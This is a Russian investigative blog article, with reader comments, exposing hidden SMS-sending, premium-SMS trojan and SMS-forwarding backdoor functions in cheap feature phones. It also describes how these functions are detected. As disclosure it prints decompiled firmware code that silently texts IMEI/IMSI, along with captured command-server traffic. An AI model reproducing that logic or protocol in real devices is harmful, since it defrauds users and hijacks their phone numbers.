TL;DR: немалое количество простых кнопочных телефонов, присутствующих в российских магазинах, содержат нежелательные недокументированные функции. Они могут совершать автоматическую отправку СМС-сообщений или выходить в интернет для передачи факта покупки и использования телефона (передавая IMEI телефона и IMSI SIM-карт). Встречаются модели со встроенным трояном, отправляющим платные СМС-сообщения на короткие номера, текст которого загружается с сервера, также бывают устройства с настоящим бэкдором, пересылающим входящие СМС-сообщения на сервер злоумышленников.
Статья описывает детали вредоносных функций и способы их обнаружения.

Введение

Исследование мобильных телефонов началось с простой идеи: можно ли использовать эти дешевые и доступные в любом магазине трубки для приёма СМС-сообщений на компьютер? Телефоны гораздо дешевле распространённых USB GSM-модемов, к тому же большинство моделей поддерживают 2 SIM-карты, а некоторые и до четырёх.
В силу почти полного отсутствия информации о наличии и возможностях AT-порта в современных телефонах, я решил купить несколько максимально разных устройств для проверки их функциональности.
Но как выбрать по-настоящему разные телефоны?

Три кита мобильных SoC

Существует три основных производителя систем-на-чипе для кнопочных звонилок:


RDA Microelectronics


Spreadtrum


Mediatek

Архитектура

MIPS

ARM

ARM

Стандарты

2G

2G/3G/4G

2G/3G/4G

Более не выпускаются, но всё ещё продаются.
Компания куплена Spreadtrum.

Ребрендированы в Unisoc, но продолжают выпускать чипы под старым брендом.

Имеют линейки для смартфонов, кнопочных телефонов, IoT, встраиваемых устройств, и т.д.

Каждый производитель чипов предоставляет свой SDK для разработки прошивок на его основе. SDK разных производителей разительно отличаются и, как правило, пишутся под конкретную линейку чипов и задачу. Функции конечного устройства также зависят от операционной системы: SDK может быть интегрирован в ОС реального времени через HAL.

Не обязательно покупать десятки и сотни телефонов для проведения полноценного тестирования: достаточно купить несколько моделей разных производителей SoC и с разными операционными системами.

Что я купил и что получил

Были куплены почти случайные телефоны, ориентируясь по визуальной составляющей интерфейса на фотографиях и в видеообзорах и немногочисленной информации о SoC в интернете:

  • Inoi 101 (RDA8826/SC6533, 600₽)

  • DEXP SD2810 (SC6531E, 699₽)

  • Itel it2160 (MT6261, 799₽)

  • Irbis SF63 (SC6531DA, 750₽)

  • F+ Flip 3 (SC6531DA, 1499₽)

Довольно быстро я осознал, что с телефонами что-то не так…

Классификация нежелательных функций

Вредоносную активность телефонов можно разделить на три категории:

  1. Отправка СМС и выход в интернет для «отслеживания продаж»
    Наиболее безобидная функция, не наносящая значительный материальный урон мобильному счёту. Устройство без ведома пользователя отправляет СМС (на обычный российский номер) или выходит в интернет, передавая IMEI-номер телефона и IMSI SIM-карты неустановленной организации или частному лицу.
    Передача данных осуществляется либо один раз до сброса устройства в заводское состояние, либо после каждого извлечения аккумулятора.

  2. Троян, отправляющий СМС на платные (короткие) номера, предварительно загрузив текст и номер с сервера через интернет
    Функция, систематически списывающая средства со счёта мобильного номера. Помимо частого автоматического и скрытного выхода в интернет (что само по себе расходует деньги на не-пакетных тарифах), мобильное устройство отправляет отдельно тарифицируемые СМС-сообщения на короткие номера, перехватывает подтверждающую СМС и отправляет текст подтверждения в ответ.

  3. Бэкдор, перехватывающий входящие СМС-сообщения и отправляющий их на сервер
    Позволяет злоумышленникам использовать ваш номер телефона для регистраций на сервисах, требующих подтверждения через СМС. Телефон периодически выходит в интернет и получает команды с сервера, результат выполнения которых отправляется обратно на сервер.

Методы обнаружения и анализа вредоносной активности

Проверка детализации мобильного оператора — способ, доступный любому человеку. Достаточно вставить рабочую SIM в телефон, включить его и оставить лежать полные сутки, после чего запросить детализацию в виде файла через онлайн-кабинет мобильного оператора. Данный метод позволяет выявить факт выхода в интернет (без адресов хостов и передаваемого содержимого), факт отправки СМС-сообщения и номер получателя, точное время совершенных действий.
Детализация помогает легко понять, содержится ли в телефоне нежелательная функциональность, без подробностей.

Детализация расходов мобильного оператора
Детализация расходов мобильного оператора

Анализ прошивки телефона — затратный метод, требующий глубоких познаний в устройстве телефона и способах обратной разработки ПО, зато позволяющий детально проанализировать вредоносные функции прошивки, а также избавиться от них.

Анализ прошивки состоит из трёх этапов:

  1. Получение дампа из телефона или поиска и скачивания прошивки в интернете

  2. Распаковки сжатых частей прошивки при необходимости

  3. Исследования кода прошивки вручную

Самый простой и универсальный, но затратный или опасный способ дампа прошивки — использование так называемых «боксов» — аппаратно-программных комплексов от сторонних разработчиков для прошивки и восстановления широкого модельного ряда телефонов. Лет 15 назад боксы были распространены и востребованы, т.к. у каждого производителя телефонов был свой кабель, свой метод подключения к компьютеру в режиме сервисного обслуживания, часто требовалось подключение к контактным панелям (падам) в аккумуляторном отсеке. Современным телефонам такое, как правило, не нужно, и актуальные «боксы» представляют собой лишь особое ПО, способное производить все действия через USB-подключение.

Для снятия прошивки я воспользовался взломанной версией Miracle Box. Чтобы модификации, сделанные крякерами, нельзя было легко посмотреть путём сравнения оригинального и измененного файла, на взломанную версию навешан Enigma Protector, прямо поверх VMProtect, который используется в оригинальном ПО. Из-за этого программа запускается около минуты и тормозит на отрисовке кнопок и компонентов при переключении вкладок.
Взломщики не озаботились отключением интернет-функций программы, что позволило авторам выявлять использование взломанной версии и, по всей видимости, выполнять произвольный код на компьютере пользователя: в окне лога появляются устрашающие надписи о сборе и отправке всех сохранённых паролей на сервер.

Miracle Box (cracked)
Miracle Box (cracked)

Преимущество подобного ПО в полной автоматизации процесса: программа сама определит конкретную модель процессора, адрес флеш-памяти и её размер. Некоторые боксы содержат встроенные эксплоиты для обхода Secure Boot и других подобных защит.

Существуют и альтернативные варианты получения дампов. Для чипов Mediatek можно воспользоваться официальной программой MTK Flash Tool, в которой есть функция чтения произвольного адреса памяти, а для RDA можно воспользоваться готовым скриптом, позволяющим прочитать в т.ч. оперативную память.
Официальное ПО для Spreadtrum: SPD Flash Tool / ResearchDownload.

Для распаковки прошивки основного раздела ALICE чипов Mediatek можно воспользоваться сторонней разработкой unalice, разжимающий файл: https://github.com/donnm/mtk_fw_tools/
Про работу с прошивками RDA я уже писал в статье «Мелкая доработка прошивки кнопочного телефона на платформе RDA8826 (SC6533, MIPS): отключаем Funbox, взламываем игры». Самый простой способ — дать распаковать всё самому телефону, после чего извлечь распакованные данные из оперативной памяти прямо во время работы телефона.
На Spreadtrum основная часть прошивки сжата модифицированным LZMA, распаковщик к которому отсутствует в публичном доступе Уже доступен. Для распаковки необходимо модифицировать несжатый код таким образом, чтобы он выполнил распаковку аппаратным устройством и передал распакованный код на компьютер, но на моём единственном устройстве порт UART был настроен на DSP, а не основной процессор, и переключить мне его не удалось. Можно было задействовать другие методы вывода (например, воспользовавшись динамиком или фонариком в качестве транспорта), но я не стал этого делать.

Базовая станция 2G — удобный и лёгкий в настройке метод массового практического анализа вредоносной активности без предварительной подготовки каждого устройства, однако требующий значительных капитальных затрат на покупку SDR-оборудования.
Метод даёт доступ ко всему сетевому трафику GSM/GPRS, с возможностью его просмотра и модификации на лету.

Моя конфигурация:

  • bladeRF x115 ($650)

  • Raspberry Pi 400 ($100)

  • Открытое и бесплатное ПО базовой станции YateBTS

  • Wireshark для анализа GSM и интернет-трафика

BladeRF питается от USB и не требует никакой дополнительной обвязки. Достаточно обычной дипольной антенны для начала работы.
YateBTS автономно реализует все компоненты GSM-стека, благодаря чему устанавливается и настраивается буквально за 30 минут. Отлично подходит для подобных исследований!

Телефоны

Inoi 101
Inoi 101

Первое и самое «чистое» купленное устройство — Inoi 101, о котором я уже писал отдельную заметку

Этот телефон не содержит вредоносных функций. Присутствуют типичные нежелательные вещи вроде меню СМС-подписок и платные игры, но устройство не выполняет какие-либо действия самовольно или скрытно.

 

 

Itel it2160
Itel it2160

Itel — китайский производитель, выпускающий устройства для развивающихся стран. Входит в холдинг Transsion, объединяющий бренды Tecno, itel, Infinix, Spice.

Модель Itel it2160 сообщает «о продаже» через интернет, без предупреждения.

POST /SaleStatistics/sendsale/sendSale?ua=itel-it2160&screen=128X160&imsi=9250991625668426&imei=354648020000251&phone_version=it2160-DL194-EnRuUk-RU-20210201&platform=2&device=1&lang=Русский язык&timeStamp=2021-01-0102:00:00&auth=ed6bdd17212ec9c9699a6b0a693870fd HTTP/1.1
Host: asv.transsion.com:8080
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
x-wap-profile: http://nds.nokia.com/uaprof/N6280r100.xml
Content-Length: 0

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 31 May 2021 16:05:17 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 52
Connection: keep-alive

{"response":{"code":"201","desc":"Repeat Products"}}

На домене asv.transsion.com была найдена панель, содержащая информацию о проданных устройствах, которую они сами присылают на сервер:

  • IMEI

  • Страна

  • Модель

  • Версия прошивки

  • Язык

  • Время активации

  • Идентификатор базовой станции (LAC/TAC)

Идентификатор базовой станции позволяет определить местоположение телефона с точностью до ≈5 километров.

Адрес панели: http://asv.transsion.com:8080/openinfo/open/index

 

  

F+ Flip 3
F+ Flip 3

Flip 3 российского OEM-поставщика F+ cообщает «о факте продажи» через СМС на номер +79584971255, отсылая IMEI и IMSI в теле сообщения.

Не содержит браузера, не выходит в интернет.

Отправка сообщения с IMEI и IMSI на номер 79584971255
Отправка сообщения с IMEI и IMSI на номер 79584971255

Декомпиляция прошивки выявляет наличие других номеров телефонов для ряда стран: +92313568243 для Пакистана (PLMN 410), +8804445600006 для Бангладеша (PLMN 470), 18049479956 для Азербайджана и Казахстана (PLMN 400, 401), +9156767215 для Индии (PLMN 404, 405).

_BYTE *__fastcall gmb_sms_sales_get_phone_number(int *plmn, int number_, int text_)
{
  int text; // r2
  char *number; // r1

  MEMORY[0x10041098](number_, text_);
  if ( plmn == (int *)410 )
  {
    text = text_;
    number = "+92313568243";
  }
  else if ( (int)plmn > 410 )
  {
    if ( (int)plmn - 410 <= 50 || plmn != (int *)470 )
      goto LABEL_17;
    text = text_;
    number = "+8804445600006";
  }
  else
  {
    if ( plmn == (int *)400 )
    {
LABEL_17:
      text = text_;
      number = "18049479956";
      return sub_10324500(number_, (unsigned __int8 *)number, text);
    }
    if ( (int)plmn > 400 )
    {
      if ( plmn == (int *)401 || plmn != (int *)404 && plmn != (int *)405 )
        goto LABEL_17;
      text = text_;
      number = "+9156767215";
    }
    else
    {
      if ( plmn != (int *)250 )
        goto LABEL_17;
      text = text_;
      number = "+79584971255";
    }
  }
  return sub_10324500(number_, (unsigned __int8 *)number, text);
}

В тексте СМС помимо IMEI и IMSI передаются три константы, по всей видимости означающие модель телефона и номер партии (дату производства):

…
sms_prepare_struct((int)v5, 32);
sub_10309198();
imsi = (const char *)get_imsi();
if ( !imsi )
  imsi = &str_zero;
imei = (const char *)get_imei();
if ( !imei )
  imei = "000000000000000";
strcpy((int)sms_str, "#%s#%s#%s#%d#%d#", imsi, imei, "250124", 64, 1);
result = schedule_sms((int)sms_str, (int)v5, v0, (int)sms_callback);

Отзывы с Яндекс.Маркета:

После включения, аппарат отправил некое СМС на номер 9584971255. Скорее всего, верну аппарат обратно в магазин.

Подтверждаю. Телефон сам отправил смс на этот номер +79584971255. Списалось 2 рубля, сотовый оператор у меня МТС. В телефоне по умолчанию не сохраняются СМС, если это не настроить. Увидел списание в детализации счета. После сброса к заводским настройкам телефон опять отправил смс на этот номер, списалось ещё 2 рубля. Пришёл ответ от поддержки, что они о таком в первый раз слышат. Несмотря на то, что я указал о таком же случае у другого владельца, отправив их сюда прочитать отзыв. Они не захотели разбираться, предположив, что я сам случайно отправил смс или это отправилось смс предыдущего человека, который смотрел телефон.

На 4pda были обнаружены архивы прошивок от нескольких моделей фирмы BQ, которые очень похожи на прошивки F+. Судя по всему, это не перепакованный архив прошивки от OEM-производителя, содержащий помимо самой прошивки еще и файлы, необходимые для её отладки. В частности, в архивах содержится прошивка в виде .elf-файла, без сжатых секций, с отладочными символами.

Открыв .elf-файл в IDA, мы можем увидеть оригинальные названия функций и переменных.

Функция отправки СМС называется gmb_sms_sales_send_sms_ext, где gmb — вероятно, gmobi — поставщик сервиса смс-подписок.

Я попытался получить подробности об этой функциональности у производителя. С компанией F+ состоялся следующий диалог:

Кнопочный телефон F+ Flip 3 в автоматическом режиме и незаметно для пользователя отправляет СМС-сообщения на номер +79584971255 при установке в него российских SIM-карт, причём отправленное СМС-сообщение не сохраняется в памяти телефона. Сообщения содержат IMEI-номер устройства, IMSI-номер SIM-карты, и три фиксированных значения.

Полный формат сообщения следующий: #IMSI#IMEI#250124#64#1# Где IMSI — IMSI-номер SIM-карты, IMEI — IMEI-номер телефона.

С какой целью данная функциональность внедрена в устройства F+?
>>> Нет информации.

Почему о ней не заявляется на официальном сайте, коробке или инструкции устройства?
>>> Потому что этот функционал внедрён не нашими инженерами.

Как обрабатываются полученные данные?
>>> Нет информации.

Какому юридическому или физическому лицу принадлежит номер +79584971255?
>>> Нет информации.

03.06.2021: Мы занимаемся решением данной проблемы. На новых ревизиях с новой прошивкой такой проблемы нет. Однако новая прошивка несовместима со старой ревизией телефонов. Как только в сервисе появится новая прошивка для старых ревизий я Вам сообщу.

15.06.2021: В сервисный центр поступила прошивка SW06 в которой решена эта проблема, обратитесь в ближайший сервисный центр из списка по ссылке https://fplusmobile.ru/support/ для перепрошивки Вашего телефона.

На просьбу выложить обновлённую версию прошивки в открытый доступ получил отказ и игнорирование дальнейших вопросов.

От BQ, прошивки которых я проанализировал и нашел подобную функциональность (отправка СМС на +79629511090), получил только совет обратиться в сервисный центр, с игнорированием дальнейших вопросов.

  

  

DEXP SD2810
DEXP SD2810

DEXP SD2810 от российского бренда сети магазинов DNS.
Опасный телефон, расходующий деньги мобильного счёта.

• Не содержит браузера, но подключается к GPRS
• Сообщает «о продаже» через интернет, без предупреждения
• Передаёт IMEI, IMSI
• Обращается к CnC в интернете и выполняет его команды
• Отправляет платные СМС на короткие номера с текстом, полученным с сервера

Телефон периодически отправляет POST-запросы по незашифрованному HTTP-соединению на домен www.mgs123.com, выполняет ответы сервера на отправку СМС-сообщений.

POST http://www.mgs123.com:8080/fee/mergserv HTTP/1.1
Host: www.mgs123.com
Accept: */*
User-Agent: MOT-E398/0E.20.34R MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0 UP.Link/5.1.2.6
Content-Length: 177

BCMD=GetFeeConfig&CRTY=6&IMSI=250991625668426&RIMSI=250991625668426&CTYPE=1&CVER=2001&NONCE=151927053004&PLMN=25099&PMOD=8411&PNUM=&RTYPE=A&SIGN=7295DD12B0B11CF997AC8B4A593D82FA


<?xml version="1.0"?>
<smtinfo>
  <BCMD>GetFeeConfig</BCMD>
  <FNUM>4169</FNUM>
  <CREP>2</CREP>
  <INTV>6000</INTV>
  <FMON>-1</FMON>
  <CTAG>1</CTAG>
  <INFO>null</INFO>
  <FAUTO>0</FAUTO>
  <FMONEY>50.0RUB</FMONEY>
  <KCON>Оплата услуги на 4169%7C88001000633</KCON>
  <FTAG>sms</FTAG>
  <GRABSMS>2</GRABSMS>
  <FMAX>0</FMAX>
  <CCON>Отправьте 2 в ответ на данное</CCON>
  <BSCO>1</BSCO>
  <FPRICE>50.0</FPRICE>
  <FNXT>45</FNXT>
  <FSHD>1</FSHD>
  <FINT>171</FINT>
  <ISTWO>0</ISTWO>
  <DATE>20210815</DATE>
  <FFOC>1</FFOC>
  <FCON>gooo mgs</FCON>
</smtinfo>

Сервер сообщает, на какой номер отправить СМС (директива FNUM, номер 4169), содержание или префикс сообщения (директива FCON, сообщение gooo mgs), а также, помимо всего прочего, ожидаемый ответный текст (CCON, "Отправьте 2 в ответ на данное") и текст ответной СМС (GRABSMS, "2").

Домен www.mgs123.com зарегистрирован в Китае, хостинг тоже находится в этой стране:

$ whois mgs123.com | grep Registrar
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://whois.aliyun.com
Registrar Registration Expiration Date: 2024-08-01T08:22:22Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
Registrar Abuse Contact Phone: +86.95187

$ dig +short www.mgs123.com
121.201.57.203

$ whois 121.201.57.203 | grep descr
descr:          Guangdong RuiJiang Science and Tech Ltd.
descr:          Room 404 ,No.100, Lingnan Avenue North,
descr:          Lingnan Building, Foshan, GuangDong,
descr:          CNC Group CHINA169 Guangdong Province Network
descr:          Addresses from CNNIC(HUANDAO)
Факт отправки SMS-сообщения, захваченный через собственную GSM-сеть.
Факт отправки SMS-сообщения, захваченный через собственную GSM-сеть.

Выдержка из новости "Новокузнечанин купил телефон со встроенной «функцией разорения счёта»":

02.01.2019, мы приобрели телефон Dexp SD2810 [...] в день покупки мы вставили сим-карты и спустя 2 часа со счёта произошло списание денежных в размере 50 рублей. По детализации я увидел, что была отправка смс на номер 4446 и заказан какой-то развлекательный контент [...]

15.01.2019 и 02.02.2019 также были отправлены смс на этот же номер 4446 и списано по 50 р. за каждую.

DEXP не ответил на запрос о вредоносной функциональности. 

 

Irbis SF63
Irbis SF63

Модель SF63 от российского OEM-поставщика Irbis.
Опасный телефон, использующий номер вашего телефона в коммерческих целях, для регистрации сторонних лиц в интернет-сервисах.

• Не содержит браузера, но подключается к GPRS
• Сообщает «о продаже» через интернет, без предупреждения
• Передаёт зашифрованные данные на сервер
• Обращается к CnC в интернете и выполняет его команды

Этот «бабушкофон» шёл из магазина с «чистой», обновлённой прошивкой. В интернете для этой модели была найдена одна единственная версия "IRBIS_SF63_GC9106_CTC_V05_GSM_FM_20181010.pac", которая и была установлена на устройство. Она оказалась с бекдором.

Телефон, как и в случае с DEXP, отправляет POST-запросы по HTTP, но эта модель шифрует передаваемые данные собственным алгоритмом с, по всей видимости, фиксированным ключом — шифрованные параметры большую часть времени одинаковы, а если меняются, то незначительно.

Данные передаются на домен hwwap.well2266.com.

GET /checkupdate?p=hxB4ZvBrVc9Hl8wcdORsVcZHmHetYc9sSHwEhuvtWc5Hkf0EYcF0SHGolxF4VEdrXcFsWERwWEhzW8RxSHGoifF4VudsXclvVc9rVuBzVuBySI6NhgZ4WEduVdZHlxV4WuFrVulrVc9sVc9HiHOvYc9HlxwuYc9HmxOrYc9HlHeIYfONk7iwlyWFYcRHjgitYc9HmPsEYc9HhHZ4Vc5oVc5oVE5sX75sWcJsWcJtVB%3D%3D HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Host: hwwap.well2266.com:8077
Connection: Keep-Alive
Cache-Control: no-cache
User-Agent: MAUI WAP Browser
Accept-Charset: utf8,gb2312

HTTP/1.1 200 
Server: nginx/1.12.0
Date: Sat, 19 Jun 2021 15:11:06 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 28
Connection: keep-alive
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: must-revalidate

hfWvjgiGiQa2VE5tVbvrWDvsXgv=

Домен зарегистрирован и хостится в Китае, в облаке Alibaba.

$ whois well2266.com | grep Registrar
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://whois.aliyun.com
Registrar Registration Expiration Date: 2023-06-17T02:47:49Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
Registrar Abuse Contact Phone: +86.95187

$ dig +short hwwap.well2266.com
47.88.242.46

$ whois 47.88.242.46 | grep Organization
Organization:   Alibaba.com LLC (AL-3)

Выдержка из заметки "Бабушкофон ворующий смс и телеграм-аккаунты"

Началось все 24 октября 2020 года. [...] телефон радостно прислал мне уведомление, что новый контакт зарегистрировался в телеграм. Сон как рукой сняло ибо в телеграме зарегистрировалась бабушка моей девушки.

Выдержка из заметки "Как получить доступ к смс любого номера или Билайн пробивает дно"

Сегодня приходит сообщение в телеграмме, что моя бабушка теперь в Telegram!

Я сильно удивился, ведь бабушке уже больше 80 лет, телефон кнопочный, без доступа в интернет.

Позвонил ей, уточнил, говорит, что недавно приходил смс-код от номера Telegram.

Скриншот диалога с зарегистрированным в Telegram номером телефона. На том конце сообщают, что номер куплен на сайте numbersell.com
Скриншот диалога с зарегистрированным в Telegram номером телефона. На том конце сообщают, что номер куплен на сайте numbersell.com

 

Результаты

4 из 5 телефонов содержат незадекларированную функциональность, из них:

​• 2​ модели расходуют деньги со счёта (отправляют данные после покупки через СМС/интернет);
​ ​• 1​ модель выходит в интернет и отправляет платные СМС-сообщения на короткие номера;
​ ​​• 1​ модель пересылает входящие сообщения через интернет.

Кто виноват?

Прежде всего виноват бренд, под которым продаются телефоны. Бренд заказывает разработку самого устройства и прошивки для него у OEM-производителя, но не проверяет конечное устройство на наличие незадекларированных возможностей. По какой-то причине, многие бренды не выкладывают прошивку на сайт, а отправляют обновлять устройство в сервисный центр в случае проблем.
Бренды F+ и BQ отрицают проблему или умалчивают о ней.

OEM-производитель готов внедрить любой каприз бренда или производителя сторонних модулей, за ваши же деньги.

Отсутствие в России специализированного министерства, которое бы занималось подобными проблемами. Минцифры (бывший Минсвязи) проверяют только сертификацию продукции на соответствие мировым и российским стандартам связи, но не функциональность конечного устройства.
Минцифры порекомендовало обращаться в Роспотребнадзор, перенеся проблему в плоскость продавец-покупатель.

Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации [...] рассмотрело Ваше обращение о производителе оборудования ООО «Ф-Плюс Мобайл» и сообщает следующее.

Согласно Положению, Минцифры России осуществляет функции по выработке и реализации государственной политики и нормативно-правовому регулированию в сфере связи [...]

Информируем, что средства связи, указанные в Вашем первоначальном обращении, прошли процедуру обязательного подтверждения соответствия Правилам применения оборудования радиодоступа. [...]

Следует отметить, что в соответствии с Правилами при декларировании телефонных аппаратов для сетей подвижной радиотелефонной связи проверка наличия или отсутствия отправки коротких сообщений в автоматическом режиме не предусмотрена.

Федеральный государственный надзор в области защиты прав потребителей осуществляется уполномоченным федеральным органом исполнительной власти – Федеральной службой по надзору в сфере защиты прав потребителей и благополучия человека (Роспотребнадзор).

Что делать?

Мобильных телефонов огромное количество, проверить их все невозможно.

  • Покупайте только проверенные мировые бренды: телефоны Nokia не содержат вредоносной функциональности, но и стоят в 2-4 раза дороже «отечественных» аналогов;

  • Читайте отзывы перед покупкой: лучше купить проверенную модель, давно присутствующую на рынке, с безупречной репутацией, чем рисковать с новинками;

  • Отслеживайте поведение нового телефона после покупки в течение суток, по детализации оператора;

  • Пишите в Роспотребнадзор, ФСБ (?) и производителю, если обнаружили непонятную активность.

…а что с приёмом СМС?

Ни один из купленных телефонов не предоставляет полноценный AT-порт через USB или Bluetooth. Чтение SMS-сообщений с компьютера не реализовано нигде.

Обновления

Комментарии (363)


  1. santjagocorkez
    31.08.2021 23:57
    +38

    Минцифры порекомендовало обращаться в Роспотребнадзор, перенеся проблему в плоскость продавец-покупатель.

    На самом деле есть еще, пусть и небольшой, но шанс перевести эту проблему в плоскость уголовного производства. Небольшой - всего лишь из-за вероятного противодействия или бездействия соответствующих органов. Фактически идёт внедрение в ПО телефона шпионского функционала (и тогда "нарушение тайны связи") или ст. 272/273 УК РФ. Это особенно весело, если производитель (уполномоченная организация/импортёр) пойдут в отказ, мол, быть не может, наши телефоны самые телефонные и чисты, как слёзы ребёнка (вот, мы специально довели ребёнка до слёз и сравнили).


    1. ValdikSS Автор
      01.09.2021 00:05
      +15

      Я не вижу других вариантов, кроме как писать в ФСБ или Отдел «К». Но делать это нужно, имея веские основания и какое-никакое доказательство вредоносной активности, что сложно для обычного покупателя подобных устройств.

      Насколько понимаю, DEXP и Irbis уже давно сняты с производства и уже почти не продаются (я купил почти последние устройства в июне), а новых супер-вредоносных моделей я не знаю. Тайну связи, в случае с F+ или BQ, наверное, применить не получится — она, вроде как, не нарушается.


      1. santjagocorkez
        01.09.2021 02:21
        +2

        Там, где не нарушается тайна связи, очень могут быть признаки ст. 272/273. Веские доказательства - это сам телефон, который можно предоставить следствию на исследование. Ну и, конечно же, придётся попинывать: запрашивать материалы проверки в порядке УПК РФ. Анализировать эти материалы. Обжаловать, если следствие уклонилось от исследования или совершения иных процессуальных действий, особенно, если они необходимы для разрешения заявления, с указанием этих действий. И так далее.


      1. ne555
        01.09.2021 09:02

        и Irbis уже давно сняты с производства и уже почти не продаются

        Откуда такая информация? 'Злополучная модель', упомянутая в статье — в продажах.

        и какое-никакое доказательство вредоносной активности,

        Ждать пока кто-то купит ваши персональные данные (смс-номер, как упомянуто в статье) и будет в Tg рассылать какие-нибудь сообщения террористческой направленности с открытым номером в настройках мессенджера?

        Здесь даже слово "жаль" не подходит к тому, как функционирует гос.ведомство. Вместо того чтобы проявить интерес и в конечном итоге (после изучения/подтверждения фактов и работой сообща с РКН/Потребнадзором), направить материалы к силовикам, приостановив 'преступную деятельность' на территории страны.

        Правильно, что приобщили 'их' к своему расследованию. Еще СМИ подхватит, заслуживающий внимания, материал... Может начнут понимать что к чему теперь.


        1. ValdikSS Автор
          01.09.2021 10:17

          'Злополучная модель', упомянутая в статье — в продажах.

          Везде «Товара нет в наличии», хоть цена и отображается.


          1. ne555
            01.09.2021 10:40
            +3

            А полтора часа назад была эта модель в наличии (я делал оформление ее, но не оплачивал).

            Видимо эффект от статьи уже начал распространяться.

            ps/ А автору рекомендую 'забэкапить данные гаджеты в банковской ячейке' на случай, если кто-то попытается причинить вам вред из-за данного расследования.


            1. muxa_ru
              02.09.2021 14:08

              Она могла висеть просто закэшенная в базе сайта и при обработке Вашей попытки актуализировать информацию из реальной базы товаров.


              1. Tatikoma
                02.09.2021 17:03

                Она могла так же уйти в резерв, если покупатель сложил последний товар в корзину. Можно завтра проверить, не вернётся ли в продажу.


      1. Burunduk73
        01.09.2021 10:18
        -56

        Нескладушки получаются) В статье было заявлено "Были куплены почти случайные телефоны", потом были сделаны выводы - "4 из 5 телефонов содержат незадекларированную функциональность", а также даны рекомендации не жалейте своих денег покупайте Нокию, и вдруг в комментариях выясняется что, как минимум два из четырех злодея давно сняты с производства и чтобы их купить надо еще постараться. Моделей кнопочных телефонов тысячи и брендов десятки, но рекламная статейка запугивает обывателей, что есть только один чистый бренд, остальные серые лошадки. Подобная статистика отражает только желание ввести в заблуждение. Ни путей решения проблемы для покупателя, ни способов борьбы с продавцом. С тем же успехом можно проводить опрос - хорошо ли живётся россиянам, сидя в буфете госдумы


        1. ValdikSS Автор
          01.09.2021 10:30
          +12

          Проблема кнопочных телефонов локальных брендов в том, что их часто выпускают одной-двумя партиями, а затем просто долго продают (год-два). Уверен, уже через год вы не сможете купить в магазине ни одну из моделей, упомянутых в статье, хотя тот же Flip 3 появился в продаже сравнительно недавно.

          Поэтому сложно дать какую-то другую рекомендацию, кроме как покупать устройство бренда с мировым именем, в надежде на лучшее.

          Я сам не знаю, как правильно поступать в этой ситуации в правовом поле, для меня это не было главной задачей. Юрист (непрофильный) тоже не подсказал чего-то, что не упомянуто в статье. Если вы знаете, в какое ведомство нужно обращаться — напишите.


          1. aamonster
            01.09.2021 11:53
            +3

            Вопрос, кому принадлежит нынешняя нокия и можно ли её считать "брендом с мировым именем".


            1. geher
              01.09.2021 19:10

              Вроде как телефонный бренд Nokia принадлежит финской компании HMD Global.

              Насчет бренда с мировым именем - вопрос открытый. С одной стороны Nokia - бренд с солидной историей и мировым именем. С другой стороны этот бренд омрачен пребыванием в лапах Microsoft, а HMD Global пока что не та самая Nokia (и в плане качества продукции тоже).


              1. bazzilic
                02.09.2021 09:43

                Мне казалось, Microsoft выкупил всё телефонное подразделение Nokia вместе с брендом для телефонов. Нет?


                1. DMGarikk
                  02.09.2021 09:54
                  +3

                  Как купил, так и продал, продал HMD Global


                  1. bazzilic
                    02.09.2021 09:56

                    Понятно, я как-то пропустил новость про продажу.


              1. F0iL
                02.09.2021 14:39
                +4

                С другой стороны этот бренд омрачен пребыванием в лапах Microsoft

                Справедливости ради, будучи в составе Microsoft они выпускали очень даже неплохие аппараты.


                1. Maximuzz
                  02.09.2021 19:32
                  +1

                  ага, кидая обновлениями то одну модель телефона, то другую


            1. Krypt
              02.09.2021 04:57
              +1

              Считать-то можно, только толку-то: Nokia 8110 4G тоже что-то слал, раз в несколько дней. Слал даже при отключённом интернет-соединении и не сконфигурированных профилях, по 15 рублей за попытку…

              Где-то на яндекс.маркете мой отзыв с одной звездой лежит в том числе и по этому поводу (можете поискать, там у меня аватар такой же как и тут, ссылку же на коммент яндекс скопировать не даёт)


              1. flashmozzg
                07.09.2021 20:17

                Именно слал (смс?) или опсос байты трафика округлял до 15 рублей? Если второе, то вина 99% на стороне оператора связи. Я такое воспроизводил почти на любом телефоне с 4G от сяоми, до Айфона. Как минимум на Теле2 и Билайне.

                Не знаю злой умысел ли (перетащить людей на тарифы с абонентской платой) или просто раздолбайство (криво настроенный учёт трафика, который считает какие-то служебные 4G пакеты).


                1. Krypt
                  07.09.2021 22:26

                  Нет, это был gprs траффик, с не настроенным (и отключённым в настройках) доступом, на тарифе без доступа к интернету. Проходил по минимальному размеру пакета. Соответственно пришлось отключать gprs услуги у оператора.

                  Вот выдержка из выписки (Tele2, выписка сохранилась под отзывом к телефону):

                  20.08.2018 21:26:08 Страйк Internet-трафик Трафик: 662 байт 662 00: 00 0,95 15,00
                  21.08.2018 23:52:07 Страйк Internet-трафик Трафик: 152 байт 152 00: 00 0,95 15,00
                  24.08.2018 23:53:00 Страйк Internet-трафик Трафик: 152 байт 152 00: 00 0,95 15,00

                  Там было больше, запрос был отправлен раз 7. Собственно я нашёл этот факт именно потому, что я пытался понять почему у меня стали испаряться деньги со счёта.


                  1. flashmozzg
                    08.09.2021 03:28

                    Ну вот такая фигня как раз от 4G. Можно было отделаться запретом 4G на телефоне.

                    В этой ветке полно таких репортов с оф. позицией "данная проблема возникает из-за особенностей вашей операционной системы.": http://tele2life.ru/forumweb/viewtopic.php?f=6&t=1096&p=130629#p130629


                    1. Krypt
                      08.09.2021 07:58

                      > Можно было отделаться запретом 4G на телефоне
